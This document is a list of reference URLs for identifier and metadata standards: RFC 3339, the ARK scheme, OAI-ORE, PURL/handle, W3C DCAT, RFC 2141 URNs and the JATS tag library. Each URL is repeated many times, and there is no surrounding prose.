http://www.ietf.org/rfc/rfc3339.txt http://www.ietf.org/rfc/rfc3339.txt http://www.ietf.org/rfc/rfc3339.txt http://www.ietf.org/rfc/rfc3339.txt http://www.ietf.org/rfc/rfc3339.txt http://www.ietf.org/rfc/rfc3339.txt http://www.ietf.org/rfc/rfc3339.txt https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf https://confluence.ucop.edu/download/attachments/16744455/arkcdl.pdf http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old http://www.slideshare.net/jakkbl/the-ark-identifier-scheme-at-ten-years-old https://tools.ietf.org/html/draft-kunze-ark-18 https://tools.ietf.org/html/draft-kunze-ark-18 https://tools.ietf.org/html/draft-kunze-ark-18 https://tools.ietf.org/html/draft-kunze-ark-18 https://tools.ietf.org/html/draft-kunze-ark-18 https://tools.ietf.org/html/draft-kunze-ark-18 https://tools.ietf.org/html/draft-kunze-ark-18 https://tools.ietf.org/html/draft-kunze-ark-18 https://tools.ietf.org/html/draft-kunze-ark-18 https://tools.ietf.org/html/draft-kunze-ark-18 https://tools.ietf.org/html/draft-kunze-ark-18 https://tools.ietf.org/html/draft-kunze-ark-18 https://tools.ietf.org/html/draft-kunze-ark-18 https://tools.ietf.org/html/draft-kunze-ark-18 https://tools.ietf.org/html/draft-kunze-ark-18 https://tools.ietf.org/html/draft-kunze-ark-18 https://tools.ietf.org/html/draft-kunze-ark-18 https://tools.ietf.org/html/draft-kunze-ark-18 https://tools.ietf.org/html/draft-kunze-ark-18 https://tools.ietf.org/html/draft-kunze-ark-18 https://tools.ietf.org/html/draft-kunze-ark-18 https://tools.ietf.org/html/draft-kunze-ark-18 https://tools.ietf.org/html/draft-kunze-ark-18 https://tools.ietf.org/html/draft-kunze-ark-18 https://tools.ietf.org/html/draft-kunze-ark-18 https://tools.ietf.org/html/draft-kunze-ark-18 https://tools.ietf.org/html/draft-kunze-ark-18 https://tools.ietf.org/html/draft-kunze-ark-18 https://tools.ietf.org/html/draft-kunze-ark-18 https://tools.ietf.org/html/draft-kunze-ark-18 https://tools.ietf.org/html/draft-kunze-ark-18 https://tools.ietf.org/html/draft-kunze-ark-18 https://tools.ietf.org/html/draft-kunze-ark-18 https://tools.ietf.org/html/draft-kunze-ark-18 https://tools.ietf.org/html/draft-kunze-ark-18 https://tools.ietf.org/html/draft-kunze-ark-18 https://tools.ietf.org/html/draft-kunze-ark-18 https://tools.ietf.org/html/draft-kunze-ark-18 https://tools.ietf.org/html/draft-kunze-ark-18 https://tools.ietf.org/html/draft-kunze-ark-18 https://tools.ietf.org/html/draft-kunze-ark-18 https://tools.ietf.org/html/draft-kunze-ark-18 https://tools.ietf.org/html/draft-kunze-ark-18 https://tools.ietf.org/html/draft-kunze-ark-18 https://tools.ietf.org/html/draft-kunze-ark-18 https://tools.ietf.org/html/draft-kunze-ark-18 http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.cdlib.org/inside/diglib/ark/arkcdl.pdf http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/documents/CompoundObjects-200705.html http://www.openarchives.org/ore/1.0/discovery http://www.openarchives.org/ore/1.0/discovery http://www.openarchives.org/ore/1.0/discovery http://www.openarchives.org/ore/1.0/discovery http://www.openarchives.org/ore/1.0/discovery http://www.openarchives.org/ore/1.0/discovery http://www.openarchives.org/ore/1.0/discovery http://www.openarchives.org/ore/1.0/discovery http://www.openarchives.org/ore/1.0/discovery http://www.openarchives.org/ore/1.0/discovery http://www.openarchives.org/ore/1.0/discovery http://www.openarchives.org/ore/1.0/discovery http://www.openarchives.org/ore/1.0/discovery http://www.openarchives.org/ore/1.0/discovery http://www.openarchives.org/ore/1.0/discovery http://www.openarchives.org/ore/1.0/discovery http://www.openarchives.org/ore/1.0/discovery http://www.openarchives.org/ore/1.0/discovery http://www.openarchives.org/ore/1.0/discovery http://www.openarchives.org/ore/1.0/discovery http://www.openarchives.org/ore/1.0/discovery http://www.openarchives.org/ore/1.0/discovery http://www.openarchives.org/ore/1.0/discovery http://www.openarchives.org/ore/1.0/discovery http://www.openarchives.org/ore/1.0/discovery http://www.openarchives.org/ore/1.0/discovery http://www.openarchives.org/ore/1.0/discovery http://www.openarchives.org/ore/1.0/discovery http://www.openarchives.org/ore/1.0/discovery http://www.openarchives.org/ore/1.0/discovery http://www.openarchives.org/ore/1.0/discovery http://www.openarchives.org/ore/1.0/discovery http://www.openarchives.org/ore/1.0/discovery http://www.openarchives.org/ore/1.0/discovery http://www.openarchives.org/ore/1.0/discovery http://www.openarchives.org/ore/1.0/discovery http://www.openarchives.org/ore/1.0/discovery http://www.openarchives.org/ore/1.0/discovery http://www.openarchives.org/ore/1.0/discovery http://www.openarchives.org/ore/1.0/discovery http://www.openarchives.org/ore/1.0/discovery http://www.openarchives.org/ore/1.0/discovery http://www.openarchives.org/ore/1.0/discovery http://www.openarchives.org/ore/1.0/discovery http://www.openarchives.org/ore/1.0/discovery http://memory.loc.gov/ammem/award/docs/PURL-handle.html http://memory.loc.gov/ammem/award/docs/PURL-handle.html http://memory.loc.gov/ammem/award/docs/PURL-handle.html http://memory.loc.gov/ammem/award/docs/PURL-handle.html http://memory.loc.gov/ammem/award/docs/PURL-handle.html http://memory.loc.gov/ammem/award/docs/PURL-handle.html http://memory.loc.gov/ammem/award/docs/PURL-handle.html http://memory.loc.gov/ammem/award/docs/PURL-handle.html http://memory.loc.gov/ammem/award/docs/PURL-handle.html http://memory.loc.gov/ammem/award/docs/PURL-handle.html http://memory.loc.gov/ammem/award/docs/PURL-handle.html http://memory.loc.gov/ammem/award/docs/PURL-handle.html http://memory.loc.gov/ammem/award/docs/PURL-handle.html http://memory.loc.gov/ammem/award/docs/PURL-handle.html http://memory.loc.gov/ammem/award/docs/PURL-handle.html http://memory.loc.gov/ammem/award/docs/PURL-handle.html http://memory.loc.gov/ammem/award/docs/PURL-handle.html http://memory.loc.gov/ammem/award/docs/PURL-handle.html http://memory.loc.gov/ammem/award/docs/PURL-handle.html http://memory.loc.gov/ammem/award/docs/PURL-handle.html http://memory.loc.gov/ammem/award/docs/PURL-handle.html http://memory.loc.gov/ammem/award/docs/PURL-handle.html http://memory.loc.gov/ammem/award/docs/PURL-handle.html http://memory.loc.gov/ammem/award/docs/PURL-handle.html http://memory.loc.gov/ammem/award/docs/PURL-handle.html http://memory.loc.gov/ammem/award/docs/PURL-handle.html http://memory.loc.gov/ammem/award/docs/PURL-handle.html http://memory.loc.gov/ammem/award/docs/PURL-handle.html http://memory.loc.gov/ammem/award/docs/PURL-handle.html http://memory.loc.gov/ammem/award/docs/PURL-handle.html http://memory.loc.gov/ammem/award/docs/PURL-handle.html http://memory.loc.gov/ammem/award/docs/PURL-handle.html http://memory.loc.gov/ammem/award/docs/PURL-handle.html http://memory.loc.gov/ammem/award/docs/PURL-handle.html http://memory.loc.gov/ammem/award/docs/PURL-handle.html http://memory.loc.gov/ammem/award/docs/PURL-handle.html http://memory.loc.gov/ammem/award/docs/PURL-handle.html http://memory.loc.gov/ammem/award/docs/PURL-handle.html http://memory.loc.gov/ammem/award/docs/PURL-handle.html http://memory.loc.gov/ammem/award/docs/PURL-handle.html http://memory.loc.gov/ammem/award/docs/PURL-handle.html http://memory.loc.gov/ammem/award/docs/PURL-handle.html http://memory.loc.gov/ammem/award/docs/PURL-handle.html http://memory.loc.gov/ammem/award/docs/PURL-handle.html http://memory.loc.gov/ammem/award/docs/PURL-handle.html http://memory.loc.gov/ammem/award/docs/PURL-handle.html http://memory.loc.gov/ammem/award/docs/PURL-handle.html http://memory.loc.gov/ammem/award/docs/PURL-handle.html http://memory.loc.gov/ammem/award/docs/PURL-handle.html http://memory.loc.gov/ammem/award/docs/PURL-handle.html http://memory.loc.gov/ammem/award/docs/PURL-handle.html http://memory.loc.gov/ammem/award/docs/PURL-handle.html http://memory.loc.gov/ammem/award/docs/PURL-handle.html http://memory.loc.gov/ammem/award/docs/PURL-handle.html http://memory.loc.gov/ammem/award/docs/PURL-handle.html http://www.w3.org/TR/vocab-dcat/ http://www.w3.org/TR/vocab-dcat/ http://www.w3.org/TR/vocab-dcat/ http://www.w3.org/TR/vocab-dcat/ http://www.w3.org/TR/vocab-dcat/ http://www.w3.org/TR/vocab-dcat/ http://www.w3.org/TR/vocab-dcat/ http://www.w3.org/TR/vocab-dcat/ http://www.w3.org/TR/vocab-dcat/ http://www.w3.org/TR/vocab-dcat/ http://www.w3.org/TR/vocab-dcat/ http://www.w3.org/TR/vocab-dcat/ http://www.w3.org/TR/vocab-dcat/ http://www.w3.org/TR/vocab-dcat/ http://www.w3.org/TR/vocab-dcat/ http://www.w3.org/TR/vocab-dcat/ http://www.w3.org/TR/vocab-dcat/ http://www.w3.org/TR/vocab-dcat/ http://www.w3.org/TR/vocab-dcat/ http://www.w3.org/TR/vocab-dcat/ http://www.w3.org/TR/vocab-dcat/ http://www.w3.org/TR/vocab-dcat/ http://www.w3.org/TR/vocab-dcat/ http://www.w3.org/TR/vocab-dcat/ http://www.w3.org/TR/vocab-dcat/ http://www.w3.org/TR/vocab-dcat/ http://www.w3.org/TR/vocab-dcat/ http://www.w3.org/TR/vocab-dcat/ http://www.w3.org/TR/vocab-dcat/ http://www.w3.org/TR/vocab-dcat/ http://www.w3.org/TR/vocab-dcat/ http://www.w3.org/TR/vocab-dcat/ http://dx.doi.org/10.1523/JNEUROSCI.1670-14.2014 https://tools.ietf.org/html/rfc2141 https://tools.ietf.org/html/rfc2141 https://tools.ietf.org/html/rfc2141 https://tools.ietf.org/html/rfc2141 https://tools.ietf.org/html/rfc2141 https://tools.ietf.org/html/rfc2141 https://tools.ietf.org/html/rfc2141 https://tools.ietf.org/html/rfc2141 https://tools.ietf.org/html/rfc2141 https://tools.ietf.org/html/rfc2141 https://tools.ietf.org/html/rfc2141 https://tools.ietf.org/html/rfc2141 https://tools.ietf.org/html/rfc2141 https://tools.ietf.org/html/rfc2141 https://tools.ietf.org/html/rfc2141 https://tools.ietf.org/html/rfc2141 https://tools.ietf.org/html/rfc2141 https://tools.ietf.org/html/rfc2141 https://tools.ietf.org/html/rfc2141 https://tools.ietf.org/html/rfc2141 https://tools.ietf.org/html/rfc2141 https://tools.ietf.org/html/rfc2141 https://tools.ietf.org/html/rfc2141 https://tools.ietf.org/html/rfc2141 https://tools.ietf.org/html/rfc2141 https://tools.ietf.org/html/rfc2141 https://tools.ietf.org/html/rfc2141 https://tools.ietf.org/html/rfc2141 https://tools.ietf.org/html/rfc2141 https://tools.ietf.org/html/rfc2141 https://tools.ietf.org/html/rfc2141 https://tools.ietf.org/html/rfc2141 https://tools.ietf.org/html/rfc2141 https://tools.ietf.org/html/rfc2141 https://tools.ietf.org/html/rfc2141 http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html http://jats.nlm.nih.gov/publishing/tag-library/1.1d2/index.html 